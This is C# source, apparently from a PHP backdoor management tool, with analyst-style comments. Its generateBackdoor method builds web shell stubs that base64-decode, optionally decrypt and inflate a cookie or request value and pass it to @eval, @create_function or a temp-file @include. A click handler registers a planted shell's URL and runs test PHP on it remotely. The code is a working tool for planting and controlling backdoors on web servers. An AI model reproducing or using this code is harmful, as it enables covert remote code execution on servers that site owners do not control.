/// <summary>
/// Builds the PHP stub text for the options chosen in the form. The stub checks that
/// <c>$_{method}['{varName}']</c> is set, base64-decodes it, optionally decrypts and/or
/// inflates it, and passes the result to the execution primitive selected by
/// <paramref name="backdoorType"/>.
/// </summary>
/// <remarks>
/// Points a reviewer or an analyst handling a recovered stub should know:
/// - With request encryption enabled, the key from <c>textBoxEncrpytionKey</c> is concatenated
///   into the output as a PHP string literal, so the key is readable in the generated file.
///   In the fixed-IV branch the IV is embedded the same way, as a constant.
/// - If the encryption checkbox is ticked but the key/IV/IV-name checks below fail, or the
///   combo box text is neither "openssl" nor "mcrypt", no decrypt wrapper is emitted and no
///   error is reported from this method; the stub is then generated without decryption.
/// - <paramref name="varName"/>, the key, the IV and the IV variable name are inserted between
///   single quotes without escaping.
/// - Every template below contains an error-suppressed call (<c>@eval</c>,
///   <c>@create_function</c> or <c>@include</c>) fed by <c>@base64_decode</c> of a request
///   superglobal; these literals appear in the output unless Helper.MinifyCode rewrites them
///   (its behaviour is not visible here).
/// </remarks>
/// <param name="varName">Key looked up in the PHP request superglobal; defaults to "command".</param>
/// <param name="method">Suffix appended to <c>$_</c> to name the superglobal (default "COOKIE"); upper-cased with the invariant culture before use.</param>
/// <param name="gzInflateRequest">When true, the decoded (and decrypted) value is wrapped in <c>@gzinflate( ... )</c>.</param>
/// <param name="backdoorType">Template to emit; EVAL, CREATE_FUNCTION and TMP_INCLUDE are handled, anything else is logged as an error.</param>
/// <returns>
/// The generated PHP text, passed through Helper.MinifyCode when <c>chkbxMinifyCode</c> is checked.
/// For an unhandled <paramref name="backdoorType"/> the text is the empty string (still minified if the box is checked).
/// </returns>
public string generateBackdoor(string varName = "command", string method = "COOKIE", bool gzInflateRequest = false, BackdoorTypes backdoorType = BackdoorTypes.EVAL)
{
    string backdoorResult = string.Empty;

    // Optional wrappers; each pair stays empty unless its option is enabled and validated,
    // so the templates below can concatenate them unconditionally.
    string gzInflateStart = string.Empty;
    string gzInflateEnd = string.Empty;

    string requestEncryptionStart = string.Empty;
    string requestEncryptionEnd = string.Empty;

    // Invariant culture keeps the superglobal name stable regardless of the UI locale.
    string requestMethod = method.ToUpper(CultureInfo.InvariantCulture);

    if (checkBoxEncryptRequest.Checked) {
        string encryptionKey = textBoxEncrpytionKey.Text;

        // Length is the only check on the key; a wrong length silently skips the wrapper.
        if (encryptionKey.Length == CryptoHelper.KEY_Length) {
            if (checkBoxSendIVInRequest.Checked) {
                // Per-request IV: the stub reads the IV from the same superglobal under this name.
                string encryptionIVVarName = textBoxIVVarName.Text;
                if (!string.IsNullOrEmpty(encryptionIVVarName)) {
                    if (comboBoxRequestEncryptionType.Text == "openssl") {
                        requestEncryptionStart = "@openssl_decrypt(";
                        requestEncryptionEnd = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, $_" + requestMethod + "['" + encryptionIVVarName + "'])";
                    } else if (comboBoxRequestEncryptionType.Text == "mcrypt") {
                        requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', ";
                        requestEncryptionEnd = ", MCRYPT_MODE_CBC, $_" + requestMethod + "['" + encryptionIVVarName + "']), \"0\")";
                    }
                }
            } else {
                // Fixed IV: the value from the form is embedded in the stub as a literal,
                // so the same IV is used by the stub for every request it decrypts.
                string encryptionIV = textBoxEncrpytionIV.Text;
                if (!string.IsNullOrEmpty(encryptionIV) && encryptionIV.Length == CryptoHelper.IV_Length) {
                    if (comboBoxRequestEncryptionType.Text == "openssl") {
                        requestEncryptionStart = "@openssl_decrypt(";
                        requestEncryptionEnd = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, '" + encryptionIV + "')";
                    } else if (comboBoxRequestEncryptionType.Text == "mcrypt") {
                        requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', ";
                        requestEncryptionEnd = ", MCRYPT_MODE_CBC, '" + encryptionIV + "'), \"0\")";
                    }
                }
            }
        }
    }

    if (gzInflateRequest) {
        gzInflateStart = "@gzinflate(";
        gzInflateEnd = ")";
    }

    // Nesting order in every template: gzinflate( decrypt( base64_decode( request value ) ) ).
    switch (backdoorType) {
        case BackdoorTypes.EVAL: {
            backdoorResult = "<?php \r\n" + "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" + "@eval(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}";
            break;
        }
        // Disabled template, kept as found in the source.
        //case BackdoorTypes.ASSERT: {
        //    backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@assert(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}";
        //    break;
        // }
        case BackdoorTypes.CREATE_FUNCTION: {
            backdoorResult = "<?php \r\n" + "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" + "$a=@create_function(null, " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" + "$a();\r\n}";
            break;
        }
        case BackdoorTypes.TMP_INCLUDE: {
            // This template writes to a tmpfile() handle and includes the file's path, so it
            // touches the server's temp directory, unlike the two templates above.
            backdoorResult = "<?php \r\n" + "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" + "$fp = @tmpfile();\r\n\t" + "$tmpf=@stream_get_meta_data($fp);\r\n\t" + "$tmpf=$tmpf['uri'];\r\n\t" + "@fwrite($fp, '<?php '."
                + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" + "@include($tmpf);\r\n\t@fclose($f);\r\n}";
            break;
        }
        // Disabled template, kept as found in the source (the author's own todo marks it as suspect).
        //case BackdoorTypes.PREG_REPLACE: {
        //    //todo this looks wrong af and doesnt support gzip
        //    backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@preg_replace(\"/.*/\x65\", " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "']" + requestEncryptionEnd + gzInflateEnd + "),'.');\r\n}";
        //    break;
        // }
        default:
            // Unhandled enum value: only logged; backdoorResult stays empty and is still returned.
            LogHelper.AddGlobalLog("Unknown backdoor type selection.", "GUI Error", LogHelper.LOG_LEVEL.ERROR);
            break;
    }

    if (chkbxMinifyCode.Checked) {
        backdoorResult = Helper.MinifyCode(backdoorResult);
    }
    return(backdoorResult);
}
/// <summary>
/// Click handler that registers the URL from <c>txtBoxShellUrl</c> in <c>BantamMain.Shells</c>,
/// copies the transport options from the form into the new <c>ShellInfo</c>, and then verifies
/// the entry by running a test snippet remotely and expecting the literal result "1".
/// On a failed verification the entry is removed again; on success the shell data is
/// initialized and the form is closed.
/// </summary>
/// <remarks>
/// NOTE(review): this is an <c>async void</c> handler and the awaited call is not wrapped in a
/// try/catch. Whether WebRequestHelper.ExecuteRemotePHP can throw or return null is not visible
/// here; if it can, the exception escapes the handler and the entry added by TryAdd stays in
/// <c>BantamMain.Shells</c>, because removal only happens on the two explicit failure paths below.
/// </remarks>
/// <param name="sender">Event source; not used in the body.</param>
/// <param name="e">Event arguments; not used in the body.</param>
private async void btnAddShell_Click(object sender, EventArgs e)
{
    string shellURL = txtBoxShellUrl.Text;

    // An empty URL is ignored without any status message.
    if (string.IsNullOrEmpty(shellURL)) {
        return;
    }

    if (checkBoxEncryptRequest.Checked) {
        string encryptionKey = textBoxEncrpytionKey.Text;
        // NOTE(review): literal 32/16 here, while generateBackdoor compares against
        // CryptoHelper.KEY_Length / CryptoHelper.IV_Length; confirm the values agree.
        if (encryptionKey.Length != 32) {
            labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
            return;
        }

        // The IV is validated only in fixed-IV mode. When the IV is sent with the request,
        // textBoxIVVarName.Text is stored further down without an emptiness check.
        if (!checkBoxSendIVInRequest.Checked) {
            string encryptionIV = textBoxEncrpytionIV.Text;
            if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16) {
                labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
                return;
            }
        }
    }

    // Remove an existing entry for this URL first, so the add below starts from a fresh ShellInfo.
    if (BantamMain.Shells.ContainsKey(shellURL)) {
        BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);

        if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut)) {
            LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
            return;
        }
    }

    // Add the new entry; every setting below is written through the dictionary indexer.
    if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo())) {
        LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
        return;
    }

    BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text;

    // Only ever set to true here; for any other combo value the ShellInfo default is kept.
    if (comboBoxVarType.Text == "cookie") {
        BantamMain.Shells[shellURL].SendDataViaCookie = true;
    }

    if (checkBoxResponseEncryption.Checked == false) {
        BantamMain.Shells[shellURL].ResponseEncryption = false;
    } else {
        BantamMain.Shells[shellURL].ResponseEncryption = true;
        BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
    }

    if (checkBoxGZipRequest.Checked) {
        BantamMain.Shells[shellURL].GzipRequestData = true;
    } else {
        BantamMain.Shells[shellURL].GzipRequestData = false;
    }

    // Captured before the await so the verification below uses the values just written.
    bool encryptResponse = BantamMain.Shells[shellURL].ResponseEncryption;
    int ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode;

    if (checkBoxEncryptRequest.Checked) {
        BantamMain.Shells[shellURL].RequestEncryption = true;
        // The key is stored on the ShellInfo as a plain string taken from the text box.
        BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text;

        if (checkBoxSendIVInRequest.Checked) {
            // Per-request IV: no fixed IV is stored, only the request variable name that carries it.
            BantamMain.Shells[shellURL].SendRequestEncryptionIV = true;
            BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty;
            BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
        } else {
            // Fixed IV: SendRequestEncryptionIV is not assigned in this branch.
            BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text;
            BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
        }
    } else {
        // Request encryption off: clear any key material on the entry.
        BantamMain.Shells[shellURL].RequestEncryption = false;
        BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
        BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty;
        BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty;
    }

    // Connectivity check: run the test snippet and require the (decrypted) result to be "1".
    string phpCode = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
    ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);

    if (string.IsNullOrEmpty(response.Result)) {
        labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
        // Roll back the entry added above; the TryRemove result is not checked.
        BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
        return;
    }

    string result = response.Result;
    if (encryptResponse) {
        // Key and IV for the response come from the ResponseObject, not from the form fields.
        result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode);
    }

    if (string.IsNullOrEmpty(result) || result != "1") {
        labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
        // Same rollback as above; a failed decryption and a wrong answer share one status message.
        BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
        return;
    }

    BantamMain.Instance.InitializeShellData(shellURL);
    this.Close();
}